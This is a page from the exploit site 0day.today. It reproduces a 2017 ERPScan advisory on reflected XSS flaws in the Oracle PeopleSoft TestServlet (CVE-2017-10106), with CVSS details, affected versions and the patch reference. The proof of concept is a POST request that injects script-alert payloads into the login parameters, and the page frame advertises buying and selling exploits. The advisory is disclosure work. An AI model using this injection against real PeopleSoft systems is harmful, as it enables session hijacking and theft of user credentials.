0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Oracle PeopleSoft ToolsRelease 8.55.03 / ToolsReleaseDB 8.55 / HCM 9.2 XSS Vulnerabilities
Author
Risk
![](/img/risk/critlow_3.gif)
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
1. ADVISORY INFORMATION Title: Multiple XSS (POST request) Vulnerabilities in TestServlet (PeopleSoft) Advisory ID: [ERPSCAN-17-037] Advisory URL: https://erpscan.com/advisories/erpscan-17-037-multiple-xss-vulnerabilities-testservlet-peoplesoft/ Risk: Medium Date published: 18.07.2017 Vendor contacted: Oracle 2. VULNERABILITY INFORMATION Class: XSS [CWE-79] Impact: Modify displayed content from a Web site, steal authentication information of a user Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2017-10106 CVSS Information CVSS Base Score v3: 6.1 / 10 CVSS Base Vector: AV: Attack Vector (Related exploit range) Network (N) AC: Attack Complexity (Required attack complexity) Low (L) PR: Privileges Required (Level of privileges needed to exploit) None (N) UI: User Interaction (Required user participation) Required (R) S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Changed (C) C: Impact to Confidentiality Low (L) I: Impact to Integrity Low (L) A: Impact to Availability None (N) 3. VULNERABILITY DESCRIPTION An attacker can use a special HTTP request to hijack session data of administrators or users of the web resource. 4. VULNERABLE PACKAGES ToolsRelease: 8.55.03 ToolsReleaseDB: 8.55 PeopleSoft HCM 9.2 # Component: com.peoplesoft.pt.portlet.service.test.TestServlet $ md5sum pspc.war/WEB-INF/classes/com/peoplesoft/pt/portlet/service/test/TestServlet.class 16634cea4be75869127b76cfc627f894 pspc.war/WEB-INF/classes/com/peoplesoft/pt/portlet/service/test/TestServlet.class 5. SOLUTIONS AND WORKAROUNDS To correct this vulnerability, implement Oracle CPU July 2017 (http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html) 6. AUTHOR Dmitri Iudin aka @ret5et 7. TECHNICAL DESCRIPTION 7.1. Proof of Concept PoC """ POST /pspc/test?userID=<script>alert(1)</script>&password=<script>alert(2)</script>&languageCode==<script>alert(5)</script>&siteName=<script>alert(3)</script>&CREFName=<script>alert(4)</script>&portalName=<script>alert(6)</script>&command=login HTTP/1.1 Host: 172.16.2.230:8000 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 twitter:@ret5et Accept-Encoding: gzip, deflate Content-Length: 0 """ 8. REPORT TIMELINE reported to the vendor - 2017-01-26 Date published: 18.07.2017 # 0day.today [2024-07-08] #